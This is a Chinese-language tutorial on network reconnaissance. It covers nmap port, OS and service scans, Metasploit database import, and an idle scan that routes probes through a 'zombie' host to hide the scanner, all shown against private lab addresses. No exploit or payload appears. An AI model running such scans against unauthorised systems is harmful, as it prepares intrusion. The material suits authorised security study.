端口种类
l公有端口(Well Know Port):0-1024
l注册端口(Registered Port):1025-49,151
l动态/私有端口(Dynamic/Private Port):49,152-65,535
端口状态
lOpen:开放状态。nmap 发起两个 SYN 的请求,服务器上监听在此端口的进程会进行应答,会返回 SYN/ACK, nmap 收到服务端返还回来的应答后会发送两个 RST ,并不会和服务端建立通信连接,完成端口的探测。
lClosed:关闭状态。nmap 发起两个 SYN 的请求,服务器上由于没有进程监听该端口,内核会返回 RST, nmap 收到服务端返还回来的 RST 报文,将探测结果定义为 closed 。
lFiltered:过滤状态。这种情况是服务端将收到的 nmap SYN 报文直接丢弃,不进行应答,由于 nmap 直接发送了两个 SYN 报文,都没有收到应答,所以认定服务端开启了防火墙,将 SYN 报文丢弃。
lUnfiltered:未过滤状态。nmap 默认进行的是 SYN 扫描,当用 -sA 选项( TCP ACK 扫描),连续发送两个同样的 ACK 报文,由于 snmp 确认收到了一个服务端根本没有发送的报文,所以服务端会发送一个 RST 报文, snmp 收到服务端发送来的 RST 报文后,确认服务端没有对报文进行丢弃处理,注意本探测不能发现端口是开放还是关闭状态,只能确认探测的报文服务端已收到,并回复给了 snmp RST报文。
lopen|filtered:开放或过滤状态。这种状态主要是nmap无法区别端口处于 open 状态还是 filtered 状态。这种状态长出现于UDP端口,参考后续 UDP 中的解释。
lclosed|filtered:关闭或者过滤状态。
扫描技术
不扫描端口 -sn
# nmap -sn 192.168.0.106
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 12:26 CST
Nmap scan report for 192.168.0.106
Host is up (0.0011s latency).
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)
Nmap done: 1 IP address (1 host up) scanned in 0.14 seconds# nmap -sn -PE 192.168.0.106
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 12:27 CST
Nmap scan report for 192.168.0.106
Host is up (0.00055s latency).
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)
Nmap done: 1 IP address (1 host up) scanned in 0.10 seconds# nmap -sn 192.168.0.1/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 12:30 CST
Nmap scan report for 192.168.0.1
Host is up (0.0043s latency).
MAC Address: F4:83:CD:A6:DE:E3 (Tp-link Technologies)
Nmap scan report for 192.168.0.106
Host is up (0.00036s latency).
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)
Nmap scan report for 192.168.0.151
Host is up (0.12s latency).
MAC Address: 38:00:25:34:7E:7F (Intel Corporate)
Nmap scan report for 192.168.0.158
Host is up (0.12s latency).
MAC Address: 38:00:25:34:7E:7F (Intel Corporate)
Nmap scan report for 192.168.0.159
Host is up (0.086s latency).
MAC Address: 38:00:25:34:7E:7F (Intel Corporate)
Nmap scan report for 192.168.0.161
Host is up (0.00032s latency).
MAC Address: 00:0C:29:FA:DD:2A (VMware)
Nmap scan report for 192.168.0.150
Host is up.
Nmap done: 256 IP addresses (7 hosts up) scanned in 2.40 secondsSYN 半开扫描 -sS
NMAP机器àSYNà机器
机器àSYN+ACKàNMAP机器
NMAP机器àRSTà机器(连接断开)
返回Open、Closed、filtered
#nmap -sS 192.168.0.106
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 12:33 CST
Nmap scan report for 192.168.0.106
Host is up (0.0011s latency).
Not shown: 978 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
25/tcp open smtp
79/tcp open finger
80/tcp open http
106/tcp open pop3pw
110/tcp open pop3
135/tcp open msrpc
139/tcp open netbios-ssn
143/tcp open imap
443/tcp open https
445/tcp open microsoft-ds
902/tcp open iss-realsecure
912/tcp open apex-mesh
1433/tcp open ms-sql-s
2383/tcp open ms-olap4
2869/tcp open icslap
3306/tcp open mysql
5555/tcp open freeciv
8000/tcp open http-alt
8009/tcp open ajp13
8080/tcp open http-proxy
8100/tcp open xprint-server
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)
Nmap done: 1 IP address (1 host up) scanned in 1.48 secondsConnect扫描 -sT
完成3次握手
NMAPà机器àSYNà机器
机器àSYN+ACKàNMAP机器
NMAP机器àACK机器(连接建立)
#nmap -sT 192.168.0.106
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 12:44 CST
Nmap scan report for 192.168.0.106
Host is up (0.0013s latency).
Not shown: 978 closed tcp ports (conn-refused)
PORT STATE SERVICE
21/tcp open ftp
25/tcp open smtp
79/tcp open finger
80/tcp open http
106/tcp open pop3pw
110/tcp open pop3
135/tcp open msrpc
139/tcp open netbios-ssn
143/tcp open imap
443/tcp open https
445/tcp open microsoft-ds
902/tcp open iss-realsecure
912/tcp open apex-mesh
1433/tcp open ms-sql-s
2383/tcp open ms-olap4
2869/tcp open icslap
3306/tcp open mysql
5555/tcp open freeciv
8000/tcp open http-alt
8009/tcp open ajp13
8080/tcp open http-proxy
8100/tcp open xprint-server
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)
Nmap done: 1 IP address (1 host up) scanned in 1.49 secondsUDP扫描 -sU
返回Open、Open|filtered,速度很慢,filtered可能是Open,可能是Closed
#nmap -sU 192.168.0.106
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 12:47 CST
Stats: 0:17:39 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 99.44% done; ETC: 13:05 (0:00:06 remaining)
Nmap scan report for 192.168.0.106
Host is up (0.00064s latency).
Not shown: 992 closed udp ports (port-unreach)
PORT STATE SERVICE
137/udp open netbios-ns
138/udp open|filtered netbios-dgm
500/udp open|filtered isakmp
1900/udp open|filtered upnp
4500/udp open|filtered nat-t-ike
5050/udp open|filtered mmcc
5353/udp open|filtered zeroconf
5355/udp open|filtered llmnr
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)
Nmap done: 1 IP address (1 host up) scanned in 1080.72 seconds扫描全部端口 -p "*"
#nmap -p "*" 192.168.0.106
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 12:49 CST
Nmap scan report for 192.168.0.106
Host is up (0.0039s latency).
Not shown: 8319 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
25/tcp open smtp
79/tcp open finger
80/tcp open http
105/tcp open csnet-ns
106/tcp open pop3pw
110/tcp open pop3
135/tcp open msrpc
139/tcp open netbios-ssn
143/tcp open imap
443/tcp open https
445/tcp open microsoft-ds
902/tcp open iss-realsecure
912/tcp open apex-mesh
1433/tcp open ms-sql-s
1536/tcp open ampr-inter
1537/tcp open sdsc-lm
1538/tcp open 3ds-lm
1539/tcp open intellistor-lm
1540/tcp open rds
1552/tcp open pciarray
1639/tcp open cert-initiator
2224/tcp open efi-mg
2383/tcp open ms-olap4
2869/tcp open icslap
3306/tcp open mysql
5040/tcp open unknown
5555/tcp open freeciv
8000/tcp open http-alt
8009/tcp open ajp13
8080/tcp open http-proxy
8100/tcp open xprint-server
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)
Nmap done: 1 IP address (1 host up) scanned in 3.69 seconds扫描频率最高的n个端口 –top-ports n
#nmap -top-ports 10 192.168.0.106
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 12:54 CST
Nmap scan report for 192.168.0.106
Host is up (0.00039s latency).
PORT STATE SERVICE
21/tcp open ftp
22/tcp closed ssh
23/tcp closed telnet
25/tcp open smtp
80/tcp open http
110/tcp open pop3
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
3389/tcp closed ms-wbt-server
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)
Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds扫描指定端口 -p port
# nmap -p 8100 192.168.0.106
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 13:02 CST
Nmap scan report for 192.168.0.106
Host is up (0.00056s latency).
PORT STATE SERVICE
8100/tcp open xprint-server
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)
Nmap done: 1 IP address (1 host up) scanned in 0.14 seconds扫描操作系统
nmap扫描操作系统采用主动方式,15个探针,不能正确发现,仅做推测。
最基本的扫描 -O
# nmap -O 192.168.0.161
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 13:05 CST
Stats: 0:00:00 elapsed; 0 hosts completed (0 up), 1 undergoing ARP Ping Scan
ARP Ping Scan Timing: About 100.00% done; ETC: 13:05 (0:00:00 remaining)
Nmap scan report for 192.168.0.161
Host is up (0.0017s latency).
Not shown: 977 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
53/tcp open domain
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
512/tcp open exec
513/tcp open login
514/tcp open shell
1099/tcp open rmiregistry
1524/tcp open ingreslock
2049/tcp open nfs
2121/tcp open ccproxy-ftp
3306/tcp open mysql
5432/tcp open postgresql
5900/tcp open vnc
6000/tcp open X11
6667/tcp open irc
8009/tcp open ajp13
8180/tcp open unknown
MAC Address: 00:0C:29:FA:DD:2A (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.01 seconds尽对“具有Open和Closed的端口”进行扫描 -O --osscan-limit
nmap -O --osscan-limit 192.168.0.158
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 14:37 CST
Nmap scan report for 192.168.0.158
Host is up (0.0068s latency).
Not shown: 991 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
MAC Address: 38:00:25:34:7E:7F (Intel Corporate)
Device type: general purpose
Running: Microsoft Windows 7|2008|8.1
OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.98 seconds猜测最接近目标端口的操作系统 -O --osscan-guest
需要root权限
# nmap -O --osscan-guess 192.168.0.159
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 14:42 CST
Nmap scan report for 192.168.0.159
Host is up (0.0092s latency).
All 1000 scanned ports on 192.168.0.159 are in ignored states.
Not shown: 1000 closed tcp ports (reset)
MAC Address: 38:00:25:34:7E:7F (Intel Corporate)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3.40 seconds扫描目标服务
扫描技术
对端口扫描:默认用SYN进行扫描
对服务识别:发出探针报文,返回确认值,确认服务
对版本识别:发出探针报文,返回报文信息,分析出服务的版本
扫描服务 -sV
# nmap -sV 192.168.0.106
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-15 10:19 CST
Nmap scan report for 192.168.0.106
Host is up (0.00034s latency).
Not shown: 985 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open httpMicrosoft HTTPAPI httpd 2.0 (SSDP/UPnP)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/httpApache httpd 2.4.23 ((Win32) OpenSSL/1.0.2h PHP/5.6.28)
445/tcp open microsoft-ds?
902/tcp open ssl/vmware-auth VMware Authentication Daemon 1.10 (Uses VNC, SOAP)
912/tcp open vmware-auth VMware Authentication Daemon 1.0 (Uses VNC, SOAP)
1433/tcp open ms-sql-sMicrosoft SQL Server 2014 12.00.2269
2383/tcp open ms-olap4?
3000/tcp open ppp?
3306/tcp open mysql MariaDB (unauthorized)
5555/tcp open freeciv?
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8080/tcp open httpApache Tomcat/Coyote JSP engine 1.1
8100/tcp open httpApache httpd 2.4.23 ((Win32) OpenSSL/1.0.2h PHP/5.6.28)
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
=====NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)=======
SF-Port3000-TCP:V=7.92%I=7%D=6/15%Time=62A941D5%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20t
SF:ext/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x
SF:20Request")%r(GetRequest,174,"HTTP/1\.0\x20302\x20Found\r\nCache-Contro
SF:l:\x20no-cache\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nExpir
SF:es:\x20-1\r\nLocation:\x20/login\r\nPragma:\x20no-cache\r\nSet-Cookie:\
SF:x20redirect_to=%2F;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nX-Conten
SF:t-Type-Options:\x20nosniff\r\nX-Frame-Options:\x20deny\r\nX-Xss-Protect
SF:ion:\x201;\x20mode=block\r\nDate:\x20Wed,\x2015\x20Jun\x202022\x2002:20
SF::09\x20GMT\r\nContent-Length:\x2029\r\n\r\n
SF:/a>\.\n\n")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Ty
SF:pe:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\
SF:x20Bad\x20Request")%r(HTTPOptions,12E,"HTTP/1\.0\x20302\x20Found\r\nCac
SF:he-Control:\x20no-cache\r\nExpires:\x20-1\r\nLocation:\x20/login\r\nPra
SF:gma:\x20no-cache\r\nSet-Cookie:\x20redirect_to=%2F;\x20Path=/;\x20HttpO
SF:nly;\x20SameSite=Lax\r\nX-Content-Type-Options:\x20nosniff\r\nX-Frame-O
SF:ptions:\x20deny\r\nX-Xss-Protection:\x201;\x20mode=block\r\nDate:\x20We
SF:d,\x2015\x20Jun\x202022\x2002:20:14\x20GMT\r\nContent-Length:\x200\r\n\
SF:r\n")%r(RTSPRequest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-T
SF:ype:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400
SF:\x20Bad\x20Request")%r(SSLSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Req
SF:uest\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x2
SF:0close\r\n\r\n400\x20Bad\x20Request")%r(TerminalServerCookie,67,"HTTP/1
SF:\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset
SF:=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(TLSSess
SF:ionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/
SF:plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Re
SF:quest")%r(Kerberos,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Ty
SF:pe:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\
SF:x20Bad\x20Request")%r(FourOhFourRequest,1A1,"HTTP/1\.0\x20302\x20Found\
SF:r\nCache-Control:\x20no-cache\r\nContent-Type:\x20text/html;\x20charset
SF:=utf-8\r\nExpires:\x20-1\r\nLocation:\x20/login\r\nPragma:\x20no-cache\
SF:r\nSet-Cookie:\x20redirect_to=%2Fnice%2520ports%252C%2FTri%256Eity\.txt
SF:%252ebak;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nX-Content-Type-Opt
SF:ions:\x20nosniff\r\nX-Frame-Options:\x20deny\r\nX-Xss-Protection:\x201;
SF:\x20mode=block\r\nDate:\x20Wed,\x2015\x20Jun\x202022\x2002:20:40\x20GMT
SF:\r\nContent-Length:\x2029\r\n\r\n
SF:);
===NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)=======
SF-Port5555-TCP:V=7.92%I=7%D=6/15%Time=62A941D5%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,138,"HTTP/1\.0\x20200\x20OK\r\nCache-Control:\x20no-cache\r\
SF:nPragma:\x20no-cache\r\nExpires:\x200\r\ncharset:\x20UTF8\r\nX-Frame-Op
SF:tions:\x20DENY\r\nX-XSS-Protection:\x201;\x20mode=block\r\nX-Content-Ty
SF:pe-Options:\x20nosniff\r\nContent-Type:\x20text/html\r\n\r\n{\"STATUS\"
SF::\x20\"REDIRECT\",\x20\"RESPONSE\":\x20\"mlogin\.html\",\x20\"ExtendedR
SF:esponse\":\x20\[{\"last_notification_change_ts\"\x20:\x20\"\"}\]}")%r(G
SF:etRequest,2D,"HTTP/1\.0\x20302\x20Found\r\nLocation:\x20mlogin\.html\r\
SF:n\r\n")%r(HTTPOptions,2D,"HTTP/1\.0\x20302\x20Found\r\nLocation:\x20mlo
SF:gin\.html\r\n\r\n")%r(RTSPRequest,2D,"HTTP/1\.0\x20302\x20Found\r\nLoca
SF:tion:\x20mlogin\.html\r\n\r\n")%r(FourOhFourRequest,6E,"HTTP/1\.1\x2040
SF:4\x20Not\x20Found\r\nCache-Control:\x20max-age=3600,\x20must-revalidate
SF:\r\nExpires:\x20Thu,\x2015\x20Jun\x202023\x2002:21:07\x20GMT\r\n")%r(SI
SF:POptions,138,"HTTP/1\.0\x20200\x20OK\r\nCache-Control:\x20no-cache\r\nP
SF:ragma:\x20no-cache\r\nExpires:\x200\r\ncharset:\x20UTF8\r\nX-Frame-Opti
SF:ons:\x20DENY\r\nX-XSS-Protection:\x201;\x20mode=block\r\nX-Content-Type
SF:-Options:\x20nosniff\r\nContent-Type:\x20text/html\r\n\r\n{\"STATUS\":\
SF:x20\"REDIRECT\",\x20\"RESPONSE\":\x20\"mlogin\.html\",\x20\"ExtendedRes
SF:ponse\":\x20\[{\"last_notification_change_ts\"\x20:\x20\"\"}\]}");
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 132.23 secondsnmap组合扫描
# nmap -Pn -sS 192.168.0.106
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-20 12:35 CST
Nmap scan report for 192.168.0.106
Host is up (0.00014s latency).
Not shown: 985 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
902/tcp open iss-realsecure
912/tcp open apex-mesh
1433/tcp open ms-sql-s
2383/tcp open ms-olap4
3000/tcp open ppp
3306/tcp open mysql
5555/tcp open freeciv
8009/tcp open ajp13
8080/tcp open http-proxy
8100/tcp open xprint-server
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)
Nmap done: 1 IP address (1 host up) scanned in 1.62 seconds# nmap -Pn -sS -A 192.168.0.106
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-20 12:40 CST
Nmap scan report for 192.168.0.106
Host is up (0.00029s latency).
Not shown: 985 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open httpMicrosoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/httpApache httpd 2.4.23 ((Win32) OpenSSL/1.0.2h PHP/5.6.28)
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
| http-title: Welcome to XAMPP
|_Requested resource was https://192.168.0.106/dashboard/
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds?
902/tcp open ssl/vmware-auth VMware Authentication Daemon 1.10 (Uses VNC, SOAP)
912/tcp open vmware-auth VMware Authentication Daemon 1.0 (Uses VNC, SOAP)
1433/tcp open ms-sql-sMicrosoft SQL Server 2014 12.00.2269.00; RTM+
| ms-sql-ntlm-info:
| Target_Name: DESKTOP-9A8VFKB
| NetBIOS_Domain_Name: DESKTOP-9A8VFKB
| NetBIOS_Computer_Name: DESKTOP-9A8VFKB
| DNS_Domain_Name: DESKTOP-9A8VFKB
| DNS_Computer_Name: DESKTOP-9A8VFKB
|_ Product_Version: 10.0.17763
|_ssl-date: 2022-06-20T04:43:40+00:00; +10s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2022-06-20T02:24:59
|_Not valid after: 2052-06-20T02:24:59
2383/tcp open ms-olap4?
3000/tcp open ppp?
…将扫描结果存为XML文件名和数据库
将扫描结果存为XML文件名
#nmap -oX nmap.xml 192.168.0.106
tarting Nmap 7.92 ( https://nmap.org ) at 2022-06-15 10:25 CST
Nmap scan report for 192.168.0.106
Host is up (0.00023s latency).
Not shown: 985 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
902/tcp open iss-realsecure
912/tcp open apex-mesh
1433/tcp open ms-sql-s
2383/tcp open ms-olap4
3000/tcp open ppp
3306/tcp open mysql
5555/tcp open freeciv
8009/tcp open ajp13
8080/tcp open http-proxy
8100/tcp open xprint-server
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)
Nmap done: 1 IP address (1 host up) scanned in 1.55 seconds
#cat nmap.xml
…
将扫描结果存为metasploit数据库
1)先导入XML文件中
#nmap -Pn -sS -A -oX nmap.xml 192.168.0.106
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-21 13:30 CST
Nmap scan report for 192.168.0.106
Host is up (0.00071s latency).
All 1000 scanned ports on 192.168.0.106 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.71 ms 192.168.0.106
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.18 seconds2)再导入数据库中
msf6 > db_import /home/jerry/nmap.xml
[*] Importing 'Nmap XML' data
[*] Import: Parsing with 'Nokogiri v1.13.1'
[*] Importing host 192.168.0.106
[*] Successfully imported /home/jerry/nmap.xml
msf6 > hosts -c address
Hosts
=====
address
-------
192.168.0.106
192.168.0.155msf 也可以和mysql 一起工作,在bt5r1中msf 默认支持连接mysql:
msf> db_driver mysql
msf> db_connect root:123456@127.0.0.1/msf3 #连接本机mysql 的msf3 数据库mysql 默认密码123456,使用db_connect 连接时会自动创建msf3 库
metasploit使用数据库扫描
简介
#/etc/init.d/postgresql start
Starting postgresql (via systemctl): postgresql.service.
# msfconsole
msf> db_connect postgres:123456@127.0.0.1/msf(初始化为postgres:toor)
[*] Connected to Postgres data service: 127.0.0.1/msf
msf> db_status
[*] Connected to msf. Connection type: postgresql.TCP空闲扫描
找到空闲机器,利用空闲机扫描,好像不在本机上执行
空闲机器IPID, 使用IP帧标识机制的空闲机器
msf6 > use auxiliary/scanner/ip/ipidseq
msf6 auxiliary(scanner/ip/ipidseq) > options
Module options (auxiliary/scanner/ip/ipidseq):
Name Current Setting Required Description
---- --------------- -------- -----------
INTERFACEno The name of the interface
RHOSTS yes The target host(s), see https://github.com/rapid7/met
asploit-framework/wiki/Using-Metasploit
RPORT 80 yes The target port
SNAPLEN65535 yes The number of bytes to capture
THREADS1 yes The number of concurrent threads (max one per host)
TIMEOUT500 yes The reply read timeout in milliseconds
msf6 auxiliary(scanner/ip/ipidseq) > set rhost 192.168.0.0/24
rhost => 192.168.0.0/24
可以设置
set rhost 192.168.0.0/24
或
set rhost 192.168.0.0-199
或
set rhost File://path/xxx.txt
msf6 auxiliary(scanner/ip/ipidseq) > set threads 50
threads => 50
windows:1-16
Unix:1-128
msf6 auxiliary(scanner/ip/ipidseq) > run
[*] 192.168.0.1's IPID sequence class: All zeros
[*] Scanned 82 of 256 hosts (32% complete)
[*] Scanned 83 of 256 hosts (32% complete)
[*] Scanned 98 of 256 hosts (38% complete)
[*] 192.168.0.106's IPID sequence class: Incremental!
[*] Scanned 103 of 256 hosts (40% complete)
[*] 192.168.0.161's IPID sequence class: All zeros
[*] 192.168.0.158's IPID sequence class: Incremental!
[*] 192.168.0.152's IPID sequence class: Randomized
[*] 192.168.0.151's IPID sequence class: Incremental!
[*] 192.168.0.159's IPID sequence class: All zeros
[*] Scanned 128 of 256 hosts (50% complete)
[*] Scanned 169 of 256 hosts (66% complete)
[*] Scanned 183 of 256 hosts (71% complete)
[*] Scanned 212 of 256 hosts (82% complete)
[*] Scanned 232 of 256 hosts (90% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ip/ipidseq) >扫描到状态为Incremental!
试图通过192.168.0.151向192.168.0.161发包
msf6 auxiliary(scanner/ip/ipidseq) > nmap -PN -sI 192.168.0.151 192.168.0.161
[*] exec: nmap -PN -sI 192.168.0.151 192.168.0.161
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 16:18 CST
Idle scan using zombie 192.168.0.151 (192.168.0.151:80); Class: Incremental
Even though your Zombie (192.168.0.151; 192.168.0.151) appears to be vulnerable to IP ID sequence prediction (class: Incremental), our attempts have failed. This generally means that either the Zombie uses a separate IP ID base for each host (like Solaris), or because you cannot spoof IP packets (perhaps your ISP has enabled egress filtering to prevent IP spoofing), or maybe the target network recognizes the packet source as bogus and drops them
QUITTING!试图通过192.168.0.106向192.168.0.161发包
msf6 auxiliary(scanner/ip/ipidseq) > nmap -PN -sI 192.168.0.106 192.168.0.161
[*] exec: nmap -PN -sI 192.168.0.106 192.168.0.161
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 16:20 CST
Idle scan zombie 192.168.0.106 (192.168.0.106) port 80 cannot be used because it has not returned any of our probes -- perhaps it is down or firewalled.
QUITTING!不用自身IP地址项目表机器发送数据包,就可以获得目标主机的开放端口
在MSF终端中执行nmap
msf6 > db_connect postgres:123456@127.0.0.1/msf
msf6 > db_nmap -sS -A 192.168.0.106
msf6> services u #查看扫描结果
msf6 > services -u
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
192.168.0.106 21 tcp ftp open FileZilla ftpd 0.9.41 beta
192.168.0.106 25 tcp smtp open Mercury/32 smtpd Mail server account Maiser
192.168.0.106 79 tcp finger open Mercury/32 fingerd
192.168.0.106 80 tcp http open Microsoft HTTPAPI httpd 2.0 SSDP/UPnP
192.168.0.106 106 tcp pop3pw open Mercury/32 poppass service
192.168.0.106 110 tcp pop3 open Mercury/32 pop3d
192.168.0.106 135 tcp msrpc open Microsoft Windows RPC
192.168.0.106 139 tcp netbios-ssn open Microsoft Windows netbios-ssn
192.168.0.106 143 tcp imap open Mercury/32 imapd 4.62
192.168.0.106 443 tcp ssl/http open Apache httpd 2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
192.168.0.106 445 tcp microsoft-ds open
192.168.0.106 902 tcp ssl/vmware-auth open VMware Authentication Daemon 1.10 Uses VNC, SOAP
192.168.0.106 912 tcp vmware-auth open VMware Authentication Daemon 1.0 Uses VNC, SOAP
192.168.0.106 1433 tcp ms-sql-s open Microsoft SQL Server 2014 12.00.2269.00; RTM+
192.168.0.106 2383 tcp ms-olap4 open
192.168.0.106 2869 tcp http open Microsoft HTTPAPI httpd 2.0 SSDP/UPnP
192.168.0.106 3306 tcp mysql open MariaDB unauthorized
192.168.0.106 5555 tcp freeciv open
192.168.0.106 8000 tcp http-alt open WSGIServer/0.2 CPython/3.8.0
192.168.0.106 8009 tcp ajp13 open Apache Jserv Protocol v1.3
192.168.0.106 8080 tcp http open Apache Tomcat/Coyote JSP engine 1.1
192.168.0.106 8100 tcp http open Apache httpd 2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
192.168.0.151 135 tcp msrpc open Microsoft Windows RPC
192.168.0.151 139 tcp netbios-ssn open Microsoft Windows netbios-ssn
192.168.0.151 445 tcp microsoft-ds open
192.168.0.151 902 tcp ssl/vmware-auth open VMware Authentication Daemon 1.10 Uses VNC, SOAP
192.168.0.151 912 tcp vmware-auth open VMware Authentication Daemon 1.0 Uses VNC, SOAP
192.168.0.151 5357 tcp http open Microsoft HTTPAPI httpd 2.0 SSDP/UPnP使用Metasploit进行端口扫描
查询端口扫描器
msf6 auxiliary(scanner/ip/ipidseq) > search portscan
Mathing Modules
================
# NameDisclosure Date RankCheck Description
- ---- --------------- --------- -----------
0 auxiliary/scanner/portscan/ftpbouncenormal No FTP Bounce Port Scanner
1 auxiliary/scanner/natpmp/natpmp_portscan normal No NAT-PMP External Port Scanner
2 auxiliary/scanner/sap/sap_router_portscanner normal No SAPRouter Port Scanner
3 auxiliary/scanner/portscan/xmas normal No TCP "XMas" Port Scanner
4 auxiliary/scanner/portscan/ack normal No TCP ACK Firewall Scanner
5 auxiliary/scanner/portscan/tcp normal No TCP Port Scanner
6 auxiliary/scanner/portscan/syn normal No TCP SYN Port Scanner
7 auxiliary/scanner/http/wordpress_pingback_access normal No Wordpress Pingback Locator
